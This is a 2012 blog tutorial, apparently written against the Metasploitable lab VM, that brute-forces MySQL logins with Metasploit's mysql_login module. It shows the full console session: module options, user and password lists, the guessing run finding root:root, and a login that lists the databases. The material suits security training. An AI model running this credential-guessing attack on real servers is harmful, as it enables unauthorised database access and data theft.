Friday, June 22, 2012

Bruteforce MySQL Using Metasploit


Hey guys,
I will demonstrate how to brute force MySQL logins using Metasploit. This is again another attack against the Metasploitable distribution I mentioned in my previous post. This is very simple and shouldn’t take long to demonstrate, so here goes:
Code:
root@bt:/pentest/exploits/framework3# ./msfconsole
 
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
 
=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)
 
msf > search mysql
[*] Searching loaded modules for pattern 'mysql'...
 
Auxiliary
=========
 
Name Rank Description
---- ---- -----------
admin/mysql/mysql_enum normal MySQL Enumeration Module
admin/mysql/mysql_sql normal MySQL SQL Generic Query
admin/tikiwiki/tikidblib normal TikiWiki information disclosure
scanner/mysql/mysql_login normal MySQL Login Utility
scanner/mysql/mysql_version normal MySQL Server Version Enumeration
 
Exploits
========
 
Name Rank Description
---- ---- -----------
linux/mysql/mysql_yassl_getname good MySQL yaSSL CertDecoder::GetName Buffer Overflow
linux/mysql/mysql_yassl_hello good MySQL yaSSL SSL Hello Message Buffer Overflow
windows/mysql/mysql_yassl_hello average MySQL yaSSL SSL Hello Message Buffer Overflow
 
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Code:
Module options:
 
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
 
msf auxiliary(mysql_login) > set PASS_FILE /root/password.txt
PASS_FILE => /root/password.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 10.113.8.102
RHOSTS => 10.113.8.102
msf auxiliary(mysql_login) > show options
 
Module options:
 
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /root/password.txt no File containing passwords, one per line
RHOSTS 10.113.8.102 yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE /root/users.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
 
msf auxiliary(mysql_login) > exploit
 
[*] 10.113.8.102:3306 - Found remote MySQL version 5.0.51a
[*] 10.113.8.102:3306 Trying username:'admin' with password:''
[*] 10.113.8.102:3306 failed to login as 'admin' with password ''
[*] 10.113.8.102:3306 Trying username:'root' with password:''
[*] 10.113.8.102:3306 failed to login as 'root' with password ''
[*] 10.113.8.102:3306 Trying username:'god' with password:''
[*] 10.113.8.102:3306 failed to login as 'god' with password ''
[*] 10.113.8.102:3306 Trying username:'systemadm' with password:''
[*] 10.113.8.102:3306 failed to login as 'systemadm' with password ''
[*] 10.113.8.102:3306 Trying username:'daemon' with password:''
[*] 10.113.8.102:3306 failed to login as 'daemon' with password ''
[*] 10.113.8.102:3306 Trying username:'admin' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'root'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'root'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'adminadmin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'adminadmin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'root' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'root' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'root' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'root'
[+] 10.113.8.102:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >
 
Bingo! We found the root password which is simply ‘root’ :-) Now let’s double check this:
 
root@bt:/pentest/exploits/framework3# mysql -h 10.113.8.102 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
 
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
 
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| tikiwiki |
| tikiwiki195 |
+--------------------+
4 rows in set (0.01 sec)
 
mysql>
Now we have complete control over their database, yay! :-)
Posted by at
Labels: , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)